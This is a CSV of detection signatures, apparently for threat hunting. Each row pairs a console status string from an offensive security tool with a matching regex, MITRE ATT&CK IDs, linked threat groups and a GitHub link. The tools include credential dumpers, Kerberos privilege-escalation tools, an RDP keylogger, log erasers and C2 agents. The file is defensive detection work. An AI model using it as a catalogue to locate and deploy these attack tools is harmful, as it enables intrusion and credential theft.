"*[+] Parsing SAM registry hive*",".{0,1000}\[\+\]\sParsing\sSAM\sregistry\shive.{0,1000}","offensive_tool_keyword","quarkspwdump","Quarks PwDump is a native Win32 tool to extract credentials from Windows operating systems","T1003 - T1003.001 - T1059","TA0006","N/A","LOTUS PANDA - PowerPool - Calypso","Credential Access","https://github.com/peterdocter/quarkspwdump","1","0","#content","N/A","9","1","12","8","2015-06-25T04:22:21Z","2015-07-14T08:18:08Z","13247"
"*[+] Parsing SAM registry hive*",".{0,1000}\[\+\]\sParsing\sSAM\sregistry\shive.{0,1000}","offensive_tool_keyword","quarkspwdump","Dump various types of Windows credentials without injecting in any process","T1003 - T1555","TA0006","N/A","N/A","Credential Access","https://github.com/quarkslab/quarkspwdump","1","0","#content","N/A","10","5","427","142","2023-01-13T03:45:25Z","2013-02-13T15:16:30Z","13248"
"*[+] Parsing SECURITY registry hive*",".{0,1000}\[\+\]\sParsing\sSECURITY\sregistry\shive.{0,1000}","offensive_tool_keyword","quarkspwdump","Quarks PwDump is a native Win32 tool to extract credentials from Windows operating systems","T1003 - T1003.001 - T1059","TA0006","N/A","LOTUS PANDA - PowerPool - Calypso","Credential Access","https://github.com/peterdocter/quarkspwdump","1","0","#content","N/A","9","1","12","8","2015-06-25T04:22:21Z","2015-07-14T08:18:08Z","13249"
"*[+] Parsing SECURITY registry hive*",".{0,1000}\[\+\]\sParsing\sSECURITY\sregistry\shive.{0,1000}","offensive_tool_keyword","quarkspwdump","Dump various types of Windows credentials without injecting in any process","T1003 - T1555","TA0006","N/A","N/A","Credential Access","https://github.com/quarkslab/quarkspwdump","1","0","#content","N/A","10","5","427","142","2023-01-13T03:45:25Z","2013-02-13T15:16:30Z","13250"
"*[+] Payload DLL successfully loaded after*",".{0,1000}\[\+\]\sPayload\sDLL\ssuccessfully\sloaded\safter.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","#content","N/A","8","4","333","36","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z","13251"
"*[+] Payload executed successfully*",".{0,1000}\[\+\]\sPayload\sexecuted\ssuccessfully.{0,1000}","offensive_tool_keyword","POC","PoC - Authenticated Remote Code Execution in VMware vCenter Server (CVE-2024-22274 Exploit)","T1213 - T1059 - T1056 - T1078 - T1578","TA0001 - TA0002 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/l0n3m4n/CVE-2024-22274-RCE","1","0","#content","N/A","10","1","42","8","2024-07-16T23:22:14Z","2024-07-15T07:26:59Z","13252"
"*[+] Payload format: pwsh*",".{0,1000}\[\+\]\sPayload\sformat\:\spwsh.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#content","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13253"
"*[+] PE Loader mode is selected!*",".{0,1000}\[\+\]\sPE\sLoader\smode\sis\sselected!.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","#content","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","13254"
"*[+] Performing recursive ShadowSpray attack. This might take a while*",".{0,1000}\[\+\]\sPerforming\srecursive\sShadowSpray\sattack\.\sThis\smight\stake\sa\swhile.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1556.005 - T1098.001 - T1098","TA0006 - TA0008 - TA0004","N/A","Black Basta","Credential Access","https://github.com/Dec0ne/ShadowSpray","1","0","#content","N/A","10","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","13255"
"*[+] PInject Loaded *",".{0,1000}\[\+\]\sPInject\sLoaded\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#content","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13256"
"*[+] Pipe listing:*",".{0,1000}\[\+\]\sPipe\slisting\:.{0,1000}","offensive_tool_keyword","RemotePipeList","A small tool that can list the named pipes bound on a remote system.","T1047 - T1021.006","TA0008 - TA0002","N/A","N/A","Discovery","https://github.com/outflanknl/C2-Tool-Collection/tree/main/Other/RemotePipeList","1","0","#content","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","13257"
"*[+] Poc By @404death *",".{0,1000}\[\+\]\sPoc\sBy\s\@404death\s.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","0","#content","N/A","8","4","357","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z","13258"
"*[+] PocScan *",".{0,1000}\[\+\]\sPocScan\s.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#content","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","13259"
"*[+] Polymorphic encryption*",".{0,1000}\[\+\]\sPolymorphic\sencryption.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","#content","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","13260"
"*[+] popping root shell*",".{0,1000}\[\+\]\spopping\sroot\sshell.{0,1000}","offensive_tool_keyword","POC","exploit the Linux Dirty Pipe vulnerability","T1068 - T1078.003 - T1071.004 - T1072 - T1105","TA0004 - TA0006?","N/A","N/A","Privilege Escalation","https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits","1","0","#content #linux","N/A","10","6","595","148","2023-05-20T05:55:45Z","2022-03-12T20:57:24Z","13261"
"*[+] Potenatially Hijackable DLL: *",".{0,1000}\[\+\]\sPotenatially\sHijackable\sDLL\:\s.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","#content","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","13262"
"*[+] PowershellKerberos Loaded*",".{0,1000}\[\+\]\sPowershellKerberos\sLoaded.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#content","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13263"
"*[+] PowerView Loaded *",".{0,1000}\[\+\]\sPowerView\sLoaded\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#content","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13264"
"*[+] PowerView Loaded*",".{0,1000}\[\+\]\sPowerView\sLoaded.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#content","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13265"
"*[+] PPID spoofing enabled*",".{0,1000}\[\+\]\sPPID\sspoofing\senabled.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#content","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","13266"
"*[+] PPID Spoofing has been disabled*",".{0,1000}\[\+\]\sPPID\sSpoofing\shas\sbeen\sdisabled.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","#content","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","13267"
"*[+] PPID Spoofing has been disabled*",".{0,1000}\[\+\]\sPPID\sSpoofing\shas\sbeen\sdisabled.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","#content","print output","10","10","2065","198","2024-07-25T09:32:07Z","2023-12-03T04:52:38Z","13268"
"*[+] printing b64encoded(zipped(cradle.py)) for scriptless execution on terminal:*",".{0,1000}\[\+\]\sprinting\sb64encoded\(zipped\(cradle\.py\)\)\sfor\sscriptless\sexecution\son\sterminal\:.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","#content","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","13269"
"*[+] Privileged file copy success! *",".{0,1000}\[\+\]\sPrivileged\sfile\scopy\ssuccess!\s.{0,1000}","offensive_tool_keyword","cobaltstrike","cobaltstrike default content strings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#content","N/A","10","10","N/A","N/A","N/A","N/A","13270"
"*[+] Proxy blanket set successfully*",".{0,1000}\[\+\]\sProxy\sblanket\sset\ssuccessfully.{0,1000}","offensive_tool_keyword","Chrome-App-Bound-Encryption-Decryption","Tool to decrypt App-Bound encrypted keys in Chrome using the IElevator COM interface with path validation and encryption protections","T1003 - T1081 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption","1","0","#content","N/A","9","5","401","73","2025-04-22T08:30:00Z","2024-10-27T11:28:35Z","13271"
"*[+] PSAsyncShell OK!*",".{0,1000}\[\+\]\sPSAsyncShell\sOK!.{0,1000}","offensive_tool_keyword","PSAsyncShell","PowerShell Asynchronous TCP Reverse Shell","T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/PSAsyncShell","1","0","#content","N/A","10","10","155","22","2023-11-08T12:30:00Z","2022-07-19T15:38:34Z","13272"
"*[+] Pyramid HTTP Server listening on port *",".{0,1000}\[\+\]\sPyramid\sHTTP\sServer\slistening\son\sport\s.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","#content","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","13273"
"*[+] Querying DC without Global Catalog: *",".{0,1000}\[\+\]\sQuerying\sDC\swithout\sGlobal\sCatalog\:\s.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","0","#content","N/A","10","1","33","7","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z","13274"
"*[+] Randomizing syscall names*",".{0,1000}\[\+\]\sRandomizing\ssyscall\snames.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005  - TA0011","N/A","Black Basta","C2","https://github.com/RedSiege/GraphStrike","1","0","#content","N/A","10","10","585","95","2024-06-25T11:18:19Z","2024-01-02T00:18:44Z","13275"
"*[+] Rasman service is error*",".{0,1000}\[\+\]\sRasman\sservice\sis\serror.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","#content","N/A","10","4","371","53","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z","13276"
"*[+] Rasman service is running!*",".{0,1000}\[\+\]\sRasman\sservice\sis\srunning!.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","0","#content","N/A","10","4","371","53","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z","13277"
"*[+] RDP Keylog saved to *",".{0,1000}\[\+\]\sRDP\sKeylog\ssaved\sto\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#content","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13278"
"*[+] RDP Keylogger Loaded*",".{0,1000}\[\+\]\sRDP\sKeylogger\sLoaded.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#content","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13279"
"*[+] RDP Keylogger started with PID *",".{0,1000}\[\+\]\sRDP\sKeylogger\sstarted\swith\sPID\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#content","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13280"
"*[+] Ready for Post-Exp :)*",".{0,1000}\[\+\]\sReady\sfor\sPost\-Exp\s\:\).{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","0","#content","N/A","10","7","671","91","2025-03-12T21:58:25Z","2023-07-24T13:59:16Z","13281"
"*[+] Registry key set. DLL will be loaded on reboot*",".{0,1000}\[\+\]\sRegistry\skey\sset\.\sDLL\swill\sbe\sloaded\son\sreboot.{0,1000}","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","0","#content","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","13282"
"*[+] Relaying seems successfull, check ntlmrelayx output!*",".{0,1000}\[\+\]\sRelaying\sseems\ssuccessfull,\scheck\sntlmrelayx\soutput!.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","#content","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","13283"
"*[+] Remote Code Executed Successfully !*",".{0,1000}\[\+\]\sRemote\sCode\sExecuted\sSuccessfully\s!.{0,1000}","offensive_tool_keyword","Rust-for-Malware-Development","malware development using Rust","T1055.001 - T1027 - T1204 - T1518 - T1056 - T1021 - T1587/001","TA0005 - TA0003 - TA0007 - TA0009 - TA0004 - TA0008 - TA0042","N/A","N/A","Exploitation tool","https://github.com/Whitecat18/Rust-for-Malware-Development","1","0","#content","N/A","8","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","13284"
"*[+] Remote COM secret : *",".{0,1000}\[\+\]\sRemote\sCOM\ssecret\s\:\s.{0,1000}","offensive_tool_keyword","PPLSystem","creates a livedump of the machine through NtDebugSystemControl to extract the COM secret and context, to then inject inside this process.","T1003.002","TA0006","N/A","N/A","Credential Access","https://github.com/Slowerzs/PPLSystem","1","0","#content","N/A","10","2","190","23","2024-05-29T18:33:35Z","2024-05-22T17:48:49Z","13285"
"*[+] Removed malicious entry from pre-commit hook in *",".{0,1000}\[\+\]\sRemoved\smalicious\sentry\sfrom\spre\-commit\shook\sin\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","13286"
"*[+] Removing scheduled task on disk artifact*",".{0,1000}\[\+\]\sRemoving\sscheduled\stask\son\sdisk\sartifact.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","#content","N/A","9","4","336","46","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z","13287"
"*[+] RootKit loaded successfully!*",".{0,1000}\[\+\]\sRootKit\sloaded\ssuccessfully!.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","0","#content","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","13288"
"*[+] Rubeus Loaded*",".{0,1000}\[\+\]\sRubeus\sLoaded.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#content","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13289"
"*[+] Run the spawn method for SYSTEM shell:*",".{0,1000}\[\+\]\sRun\sthe\sspawn\smethod\sfor\sSYSTEM\sshell\:.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Back Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","#content","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","13290"
"*[+] RUNNING ALL KNOWN EXPLOITS*",".{0,1000}\[\+\]\sRUNNING\sALL\sKNOWN\sEXPLOITS.{0,1000}","offensive_tool_keyword","CoercedPotato","CoercedPotato From Patate (LOCAL/NETWORK SERVICE) to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 Windows 11 and Server 2022.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Prepouce/CoercedPotato","1","0","#content","N/A","10","4","366","66","2024-08-26T08:09:00Z","2023-09-11T19:04:29Z","13291"
"*[+] running normal privesc*",".{0,1000}\[\+\]\srunning\snormal\sprivesc.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","#content #linux","CVE-2024-1086 POC","10","10","2357","314","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z","13292"
"*[+] RX Injection address: *",".{0,1000}\[\+\]\sRX\sInjection\saddress\:\s.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#content","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","13293"
"*[+] S4U2proxy success!*",".{0,1000}\[\+\]\sS4U2proxy\ssuccess!.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Back Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","#content","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","13294"
"*[+] S4U2proxy success!*",".{0,1000}\[\+\]\sS4U2proxy\ssuccess!.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","#content","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","13295"
"*[+] S4U2self success!*",".{0,1000}\[\+\]\sS4U2self\ssuccess!.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Back Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","#content","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","13296"
"*[+] S4U2self success!*",".{0,1000}\[\+\]\sS4U2self\ssuccess!.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","#content","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","13297"
"*[+] Safety checks passed. Implanting your DLL*",".{0,1000}\[\+\]\sSafety\schecks\spassed\.\sImplanting\syour\sDLL.{0,1000}","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","0","#content","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","13298"
"*[+] Save encrypted shellcode to *",".{0,1000}\[\+\]\sSave\sencrypted\sshellcode\sto\s.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tool","https://github.com/nickvourd/Supernova","1","0","#content","N/A","10","9","829","151","2025-04-18T19:15:22Z","2023-08-08T11:30:34Z","13299"
"*[+] Scanning computers list on SMB port *",".{0,1000}\[\+\]\sScanning\scomputers\slist\son\sSMB\sport\s.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/ProcessusT/HEKATOMB","1","0","#content","N/A","10","6","510","59","2024-07-31T19:05:30Z","2022-09-09T15:07:15Z","13300"
"*[+] security evtx file handle unlock succ*",".{0,1000}\[\+\]\ssecurity\sevtx\sfile\shandle\sunlock\ssucc.{0,1000}","offensive_tool_keyword","EventCleaner","erase specified records from Windows event logs","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventCleaner","1","0","#content","N/A","10","6","599","148","2018-09-07T11:02:01Z","2018-07-27T07:37:32Z","13301"
"*[+] Seems like the creds are valid: * :: * on *",".{0,1000}\[\+\]\sSeems\slike\sthe\screds\sare\svalid\:\s.{0,1000}\s\:\:\s.{0,1000}\son\s.{0,1000}","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","0","#content","N/A","N/A","1","87","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z","13302"
"*[+] SeImpersonatePrivilege enabled*",".{0,1000}\[\+\]\sSeImpersonatePrivilege\senabled.{0,1000}","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","0","#content","N/A","10","10","156","19","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z","13303"
"*[+] Sending S4U2proxy request to domain controller *",".{0,1000}\[\+\]\sSending\sS4U2proxy\srequest\sto\sdomain\scontroller\s.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Back Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","#content","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","13304"
"*[+] Sending S4U2proxy request via KDC proxy: *",".{0,1000}\[\+\]\sSending\sS4U2proxy\srequest\svia\sKDC\sproxy\:\s.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Back Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","#content","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","13305"
